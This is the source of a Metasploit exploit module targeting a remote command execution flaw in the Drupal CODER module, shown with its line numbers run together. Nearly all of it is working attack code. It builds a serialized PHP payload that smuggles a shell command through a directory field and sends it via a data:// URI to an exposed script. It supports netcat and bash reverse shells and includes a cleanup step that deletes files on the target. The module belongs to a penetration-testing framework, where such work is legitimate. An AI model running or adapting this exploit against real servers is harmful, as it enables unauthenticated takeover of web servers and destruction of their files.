Path: blob/master/modules/exploits/unix/webapp/drupal_coder_exec.rb
19511 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Drupal CODER Module Remote Command Execution',15'Description' => %q{16This module exploits a Remote Command Execution vulnerability in the17Drupal CODER Module. Unauthenticated users can execute arbitrary18commands under the context of the web server user.1920The CODER module doesn't sufficiently validate user inputs in a script21file that has the PHP extension. A malicious unauthenticated user can22make requests directly to this file to execute arbitrary commands.23The module does not need to be enabled for this to be exploited.2425This module was tested against CODER 2.5 with Drupal 7.5 installed on26Ubuntu Server.27},28'License' => MSF_LICENSE,29'Author' => [30'Nicky Bloor <[email protected]>', # discovery31'Mehmet Ince <[email protected]>' # msf module32],33'References' => [34['URL', 'https://www.drupal.org/node/2765575']35],36'Privileged' => false,37'Payload' => {38'Space' => 250,39'DisableNops' => true,40'BadChars' => "\x2f",41'Compat' =>42{43'PayloadType' => 'cmd cmd_bash',44'RequiredCmd' => 'generic netcat netcat-e bash-tcp'45},46},47'Platform' => ['unix'],48'Arch' => ARCH_CMD,49'Targets' => [ ['Automatic', {}] ],50'DisclosureDate' => '2016-07-13',51'DefaultTarget' => 0,52'Notes' => {53'Reliability' => UNKNOWN_RELIABILITY,54'Stability' => UNKNOWN_STABILITY,55'SideEffects' => UNKNOWN_SIDE_EFFECTS56}57)58)5960register_options(61[62OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])63]64)6566self.needs_cleanup = true67end6869def check70res = send_request_cgi(71'method' => 'GET',72'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php')73)7475if res && res.body.include?('file parameter is not setNo path to parameter file')76Exploit::CheckCode::Appears77else78Exploit::CheckCode::Safe79end80end8182def exploit83p = ''84p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'85p << 's:11:"theme_cache";s:16:"theme_cache_test";'86p << 's:9:"variables";s:14:"variables_test";'87p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'88p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'89p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'90p << 's:7:"new_dir";s:'91p << (payload.encoded.length + 5).to_s92p << ':"-v;'93p << payload.encoded94p << ' #";s:4:"name";s:4:"test";}}}'9596pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"9798send_request_cgi(99'method' => 'GET',100'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),101'encode_params' => false,102'vars_get' => {103'file' => pl104}105)106end107108# XXX: FileDropper can't handle weird filenames109def on_new_session(session)110# This find command should be decently portable...111command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'112print_status("Cleaning up: #{command}")113session.shell_command_token(command)114end115end116117118